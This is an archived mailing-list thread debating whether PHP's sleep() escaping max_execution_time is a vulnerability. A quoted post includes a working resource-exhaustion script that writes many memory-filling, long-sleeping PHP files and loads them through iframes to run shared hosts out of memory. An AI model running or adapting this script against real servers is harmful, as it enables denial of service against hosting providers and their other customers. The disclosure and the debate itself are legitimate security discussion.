Re: function sleep() in all versions of PHP

Mark,
I agree with you that this is a known issue, and that there are ways
around it, however I would in fact call it a vulnerability.

The reasoning behind this is behind the definition of vulnerability,
and here is a good one:
"a weakness in a system allowing unauthorized action [(NRC91:301;
Amo94:2) Sandia] A flaw or weakness in a system's design,
implementation, or operation and management that could be exploited to
violate the system's security policy. ..."
[http://www.terena.org/activities/tf-csirt/iodef/docs/i-taxonomy_terms.html]

In this case a security policy has been designated with the
"max_execution_time" directive and that policy is being violated by
the blocking code. As you say there are ways around this, (kill
script, resource limiting, etc..) however there can be similar
mitigating circumstances in any situation where you have a
vulnerability (firewall, executable stack protection, etc..).

As with any vulnerability it is the vendor's responsibility to provide
a fix and protect it's users. Many web developers or administrators
may not know of this issue, and therefore will not be providing a mitigation.

I am of the opinion that PHP (As PHP (not Apache) is the one providing
the "max_execution_time" directive) should automatically interrupt any
processes in the process tree from the current script execution to
avoid violation of the directive.


On Mon, May 26, 2008 at 4:44 PM, Mark Sanders <mark@xxxxxxxxx> wrote:
This vulnerability is not per se a vulnerability but a annoyance that has
been dealt with in many ways.

It is quite common to not let any process on a web server run longer then a
specified time. This is usually made possible by some trivial shell
scripting that checks the running time of certain processes.

This annoyance is also not limited to PHP. Any scripting language that has
the ability to execute something with the means of system() can create and
call a script that uses memory and waits indefinitely.

This is also an annoyance that will not be seen as a bug or will be "fixed"
because it would leave the language almost useless. Although some do attempt
to fix this by disabling all possible functions that can execute something
like exec, system, eval, etc. but it is not limited to that. The same long
wait can be achieved with fsockopen or any other stream function like fread,
fwrite, etc. Even if your wait is limited to 60 seconds you can just repeat
it in a simple loop and still maintain the very low actual cpu time usage.

This is and has never been a security hole or threat. It will also never be.
It is just an annoyance for which many solutions are already available.

Greetings,

Mark Sanders.

gogulas@xxxxx wrote:

There is a quite big problem with sleep() function in php, The
max_execution_time set to 60sec. in safe mode can be easy passed by using
sleep() funcion, for example this script:
<?php
sleep(9999999);
echo 'Hello World';
?>
Will print hello world after 9999999 seconds... so max_execution_time
simply dosnt work :P Why? we can find in manual:
"max_execution_time only affect the execution time of the script itself.
Any time spent on activity that happens outside the execution of the script
such as system calls using system(), stream operations, database queries,
etc. is not included when determining the maximum time that the script has
been running."
including sleep() :P
We can use this vuln to run out memory on web/php hosting:
<?php
if (!file_exists('./temp')) (@mkdir("/temp", 0777))? $temp='temp/':
$temp='';
else $temp='temp/';
for($n=0;$n<128;$n++) {
$rand = mt_rand();
$fp = fopen("$temp$rand.php", 'w+');
fwrite($fp, '<?php while(memory_get_usage()<16000000) $a.=\'X\';
sleep(999999999); ?>');// for 16mb memory limit
fclose($fp);
echo "<iframe src=\"$temp$rand.php\" name=$n width=\"10\"
height=\"10\"></iframe>";
}
?>










--

Charles Morris
cmorris@xxxxxxxxxx,
cmorris@xxxxxxxxxxxx

Network Security Administrator,
Software Developer

Office of Computing and Communications Services,
CS Systems Group Old Dominion University
http://www.cs.odu.edu/~cmorris

Relevant Pages

  • Re: [PHP] PHP console script vs C/C++/C#
    ... My script is taking a longer time to execute than I want. ... I prefer to write in PHP because that is what I know best. ... This is why I am thinking about rewriting my whole script in a C language. ... Perhaps there are different methods I could be using to speed up execution. ...
    (php.general)
  • Re: [PHP] PHP console script vs C/C++/C#
    ... My script is taking a longer time to execute than I want. ... I prefer to write in PHP because that is what I know best. ... thinking about rewriting my whole script in a C language. ... execution of the code. ...
    (php.general)
  • [Full-disclosure] Original Photo Gallery Remote Command Execution
    ... The systems consist of two parts: "a client side script to scale your ... Upgrade to the new version 0.11.3 witch fix this vulnerability. ... Disable execution using disable_functions in php.ini. ... VENDOR RESPONSE ...
    (Full-Disclosure)
  • Yet another UNICODE exploit code and vulnerability test for IIS 4.0/5.0.
    ... Yet another UNICODE exploit code and vulnerability test for IIS 4.0/5.0. ... This is a SHELL script written in PHP, in order to run the code ... You'll get the cgi interperter for the script. ... Test the host and get the variants number in case vulnerability exists ...
    (Bugtraq)
  • Re: PHPMailer - False Positives
    ... My problem is that the PHPMailer action is returning a "true" result ... Initially the script created a new object for each email (sending them ... each execution), but the fault was evident in each configuration. ... PHP Classes - Free ready to use OOP components written in PHP ...
    (comp.lang.php)